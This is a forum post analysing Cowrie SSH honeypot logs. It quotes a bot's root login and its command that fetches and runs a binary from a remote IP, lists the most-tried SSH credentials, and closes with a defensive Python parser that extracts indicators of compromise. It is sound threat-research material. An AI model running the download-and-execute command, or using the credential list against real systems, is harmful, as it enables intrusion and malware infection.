Title: Interesting SSH honeypot (Cowrie) logs
Posted by: el-brujo on 17 February 2021, 16:07 pm

Playing with the honeypots I have seen some interesting things, although it is all automated tooling and not attacks by "real" people; they are all bots.
But in the log I am posting, a Chinese IP:
Chinese IP https://www.elhacker.net/geolocalizacion.html?host=154.223.167.54

It downloaded a binary called 80

Quote:
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.111.131/80; curl -O http://98.159.111.131/80; chmod +x 80; ./80

80 ELF binary
https://www.virustotal.com/gui/file/bbbbac8f4a02d21c4643f709e355aa5ed43e98725a5c08742a4b8e295eb6f631/detection

gcc.pid ????
https://www.virustotal.com/gui/file/05b08f11a7073248fb29cfedb0ac4d4e050356b83eeaec8d7bbcd9f25b79fdbb

Top 10 most used commands:
(https://i.imgur.com/BBLAnol.png)

On another machine, quite different results:
(https://i.imgur.com/6fe20Dy.png)

I attach the log

Quote:
2021-01-28T18:37:58.692411Z [cowrie.ssh.factory.CowrieSSHFactory] New connection: 154.223.167.54:43236 (192.168.0.7:2222) [session: 1f08d81dd680]
2021-01-28T18:37:58.697484Z [HoneyPotSSHTransport,4,154.223.167.54] Remote SSH version: b'SSH-2.0-PUTTY'
2021-01-28T18:37:58.957221Z [HoneyPotSSHTransport,4,154.223.167.54] SSH client hassh fingerprint: 92674389fa1e47a27ddd8d9b63ecd42b
2021-01-28T18:37:58.962131Z [HoneyPotSSHTransport,4,154.223.167.54] kex alg, key alg: b'diffie-hellman-group14-sha1' b'ssh-rsa'
2021-01-28T18:37:58.962417Z [HoneyPotSSHTransport,4,154.223.167.54] outgoing: b'aes128-ctr' b'hmac-sha1' b'none'
2021-01-28T18:37:58.962656Z [HoneyPotSSHTransport,4,154.223.167.54] incoming: b'aes128-ctr' b'hmac-sha1' b'none'
2021-01-28T18:37:59.568103Z [HoneyPotSSHTransport,4,154.223.167.54] NEW KEYS
2021-01-28T18:37:59.818998Z [HoneyPotSSHTransport,4,154.223.167.54] starting service b'ssh-userauth'
2021-01-28T18:38:00.081545Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] b'root' trying auth b'none'
2021-01-28T18:38:00.340869Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] b'root' trying auth b'password'
2021-01-28T18:38:00.342139Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] Could not read etc/userdb.txt, default database activated
2021-01-28T18:38:00.342961Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] login attempt [b'root'/b'mucleus.caca.root'] succeeded
2021-01-28T18:38:00.346823Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] Initialized emulated server as architecture: linux-x64-lsb
2021-01-28T18:38:00.348560Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] b'root' authenticated with b'password'
2021-01-28T18:38:00.349507Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] starting service b'ssh-connection'
2021-01-28T18:38:00.603490Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] got channel b'session' request
2021-01-28T18:38:00.604767Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] channel open
2021-01-28T18:38:00.950026Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] executing command "b'#!/bin/sh\nPATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\nwget http://98.159.111.131/80\ncurl -O http://98.159.111.131/80\nchmod +x 80\n./80\n'"
2021-01-28T18:38:00.952721Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] CMD: #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.111.131/80; curl -O http://98.159.111.131/80; chmod +x 80; ./80;
2021-01-28T18:39:01.013363Z [-] exitCode: 1
2021-01-28T18:39:01.013920Z [-] sending request b'exit-status'
2021-01-28T18:39:01.015173Z [-] Closing TTY Log: var/lib/cowrie/tty/419a5f3fde27adba89708285693140846f5cf0e98a43290aa5003d8b4a4252d5 after 60 seconds
2021-01-28T18:39:01.015774Z [-] sending close 0
2021-01-28T18:39:01.519587Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] remote close
2021-01-28T18:39:01.520955Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] got channel b'session' request
2021-01-28T18:39:01.521879Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] channel open
2021-01-28T18:39:01.774363Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] asking for subsystem "b'sftp'"
2021-01-28T18:39:01.775031Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] {b'sftp': <class 'twisted.conch.ssh.filetransfer.FileTransferServer'>}
2021-01-28T18:39:02.500813Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] SFTP openFile: b'/bin/eyshcjdmzg'
2021-01-28T18:39:06.584852Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66161 to 64911 in channel 1
2021-01-28T18:39:10.653511Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:14.733271Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:18.811865Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:22.897300Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:26.974574Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:31.093693Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:35.187235Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:39.297588Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:43.879794Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] SFTP Uploaded file "eyshcjdmzg" to var/lib/cowrie/downloads/bbbbac8f4a02d21c4643f709e355aa5ed43e98725a5c08742a4b8e295eb6f631
2021-01-28T18:39:44.136949Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending close 1
2021-01-28T18:39:44.138294Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] remote close
2021-01-28T18:39:44.139275Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] got channel b'session' request
2021-01-28T18:39:44.140193Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] channel open
2021-01-28T18:39:44.480978Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] executing command "b'/bin/eyshcjdmzg'"
2021-01-28T18:39:44.483424Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] CMD: /bin/eyshcjdmzg
2021-01-28T18:39:44.485118Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] Command not found: /bin/eyshcjdmzg
2021-01-28T18:39:54.752142Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] exitCode: 0
2021-01-28T18:39:54.752851Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending request b'exit-status'
2021-01-28T18:39:54.754609Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] Closing TTY Log: var/lib/cowrie/tty/27bfa685b0774a88946b7b3f3d0f6291bcc8e0ae37769309a8d086593862c0d0 after 10 seconds
2021-01-28T18:39:54.759462Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending close 2
2021-01-28T18:39:55.004309Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] remote close
2021-01-28T18:39:55.296545Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] got channel b'session' request
2021-01-28T18:39:55.297591Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] channel open
2021-01-28T18:39:56.293421Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] executing command "b'ls -la /var/run/gcc.pid'"
2021-01-28T18:39:56.295896Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] CMD: ls -la /var/run/gcc.pid
2021-01-28T18:39:56.297632Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] Command found: ls -la /var/run/gcc.pid
2021-01-28T18:39:56.298644Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] exitCode: 0
2021-01-28T18:39:56.298941Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending request b'exit-status'
2021-01-28T18:39:56.299253Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending close 3
2021-01-28T18:39:57.974393Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] exitCode: 0
2021-01-28T18:39:57.975498Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] Closing TTY Log: var/lib/cowrie/tty/e9ca076a73c58dc3b053e9f3e0249b13f1c1b47d23846405096e8c10dc3f7d26 after 1 seconds
2021-01-28T18:39:57.978774Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] remote close
2021-01-28T18:39:57.979388Z [HoneyPotSSHTransport,4,154.223.167.54] Got remote error, code 11 reason: b''
2021-01-28T18:39:57.980313Z [HoneyPotSSHTransport,4,154.223.167.54] avatar root logging out
2021-01-28T18:39:57.980654Z [HoneyPotSSHTransport,4,154.223.167.54] connection lost
2021-01-28T18:39:57.980912Z [HoneyPotSSHTransport,4,154.223.167.54] Connection lost after 119 seconds

On Twitter and on the blog I have published some of the most common username/password combinations

Quote:
############ Top 20 COWRIE Usernames for 2021-02-11 ############
3288 b'root'|b'password'
751 b'admin'|b'password'
727 b'root'|b'none'
426 b'admin'|b'none'
252 b'Admin'|b'password'
140 b'user'|b'password'
124 b'Admin'|b'none'
118 b'ubuntu'|b'password'
96 b'nproc'|b'password'
91 b'test'|b'password'
80 b'postgres'|b'password'
46 b'nagios'|b'password'
42 b'oracle'|b'password'
39 b'guest'|b'password'
38 b'support'|b'password'
38 b'Administrator'|b'password'
30 b'git'|b'password'
28 b'deploy'|b'password'
24 b'ftpuser'|b'password'
22 b'user'|b'none'

(https://i.imgur.com/eKSqzBl.png)

On another IP, not exactly the same results:
(https://i.imgur.com/7RNhrh6.png)

And some full charts (country, etc.)

Quote:
1- Ireland
2- Russia
3- Panama

688 different IPs in barely 9 hours
(https://i.imgur.com/neBE16z.png)
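The session above shows everything a responder wants out of a Cowrie text log: the source IP and session id, the credential that "succeeded", the `CMD:` lines (with the URL the bot fetched), and the SHA-256 under which Cowrie stored the SFTP-uploaded binary. The following script, added as an illustration and not code from the post or from the Cowrie project, pulls those fields out of `cowrie.log` lines with regular expressions, tallies username/password pairs the way the "Top 20" table above does, and flattens the result into indicator lists. The sample input is constructed: the first seven lines are adapted from the session quoted above, the last two are invented to show the credential tally; the regexes match the message formats visible in this log and nothing else.

```python
import re
from collections import Counter

# Constructed sample. Lines 1-7 are adapted from the Cowrie session quoted in
# the post; the two 198.51.100.23 lines are invented to exercise the tally.
SAMPLE_LOG = """\
2021-01-28T18:37:58.692411Z [cowrie.ssh.factory.CowrieSSHFactory] New connection: 154.223.167.54:43236 (192.168.0.7:2222) [session: 1f08d81dd680]
2021-01-28T18:37:58.697484Z [HoneyPotSSHTransport,4,154.223.167.54] Remote SSH version: b'SSH-2.0-PUTTY'
2021-01-28T18:38:00.342961Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] login attempt [b'root'/b'mucleus.caca.root'] succeeded
2021-01-28T18:38:00.952721Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] CMD: #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.111.131/80; curl -O http://98.159.111.131/80; chmod +x 80; ./80;
2021-01-28T18:39:43.879794Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] SFTP Uploaded file "eyshcjdmzg" to var/lib/cowrie/downloads/bbbbac8f4a02d21c4643f709e355aa5ed43e98725a5c08742a4b8e295eb6f631
2021-01-28T18:39:44.483424Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] CMD: /bin/eyshcjdmzg
2021-01-28T18:39:56.295896Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] CMD: ls -la /var/run/gcc.pid
2021-01-28T19:02:11.000000Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,5,198.51.100.23] login attempt [b'admin'/b'password'] failed
2021-01-28T19:02:12.000000Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,5,198.51.100.23] login attempt [b'root'/b'123456'] failed
"""

IPV4 = r"(\d{1,3}(?:\.\d{1,3}){3})"
# Source IP is the last field of the HoneyPotSSHTransport tag on every line after the handshake.
SRC_RE = re.compile(r"HoneyPotSSHTransport,\d+," + IPV4 + r"\]")
NEW_RE = re.compile(r"New connection: " + IPV4 + r":\d+ .*\[session: ([0-9a-f]+)\]")
LOGIN_RE = re.compile(r"login attempt \[b'([^']*)'/b'([^']*)'\] (succeeded|failed)")
CMD_RE = re.compile(r"\] CMD: (.*)$")          # the joined one-line form, not the raw "executing command" echo
UPLOAD_RE = re.compile(r'SFTP Uploaded file "([^"]+)" to \S*?([0-9a-f]{64})')
URL_RE = re.compile(r"https?://[^\s;'\"|&]+")  # stop at shell separators so "http://x/80;" keeps no ';'


def parse_cowrie(text):
    """Extract sessions, credential attempts, executed commands, uploaded
    binaries (by SHA-256) and every URL that appeared in a command."""
    out = {"sessions": [], "logins": [], "commands": [], "uploads": [], "urls": set()}
    for line in text.splitlines():
        m = NEW_RE.search(line)
        if m:
            out["sessions"].append((m.group(1), m.group(2)))
            continue
        src = SRC_RE.search(line)
        ip = src.group(1) if src else None
        m = LOGIN_RE.search(line)
        if m:
            out["logins"].append((ip, m.group(1), m.group(2), m.group(3)))
            continue
        m = CMD_RE.search(line)
        if m:
            cmd = m.group(1).strip()
            out["commands"].append((ip, cmd))
            out["urls"].update(URL_RE.findall(cmd))
            continue
        m = UPLOAD_RE.search(line)
        if m:
            out["uploads"].append((ip, m.group(1), m.group(2)))
    return out


def top_credentials(logins, n=20):
    """Count (username, password) pairs, successful or not, like the Top 20 table."""
    return Counter((user, pw) for _ip, user, pw, _result in logins).most_common(n)


def iocs(parsed):
    """Flatten the parse into sorted indicator lists: source IPs, fetched URLs, file hashes."""
    ips = {ip for ip, _sid in parsed["sessions"]} | {ip for ip, *_ in parsed["logins"] if ip}
    hashes = {sha for _ip, _name, sha in parsed["uploads"]}
    return sorted(ips), sorted(parsed["urls"]), sorted(hashes)


if __name__ == "__main__":
    parsed = parse_cowrie(SAMPLE_LOG)
    for count, (user, pw) in ((c, k) for k, c in top_credentials(parsed["logins"])):
        print(f"{count} b'{user}'|b'{pw}'")
    for label, items in zip(("ips", "urls", "sha256"), iocs(parsed)):
        print(label, items)
```

To run it on a real honeypot, replace `SAMPLE_LOG` with the contents of `var/log/cowrie/cowrie.log`; the hashes it emits are the file names under `var/lib/cowrie/downloads/`, which is exactly what was pasted into the VirusTotal links above.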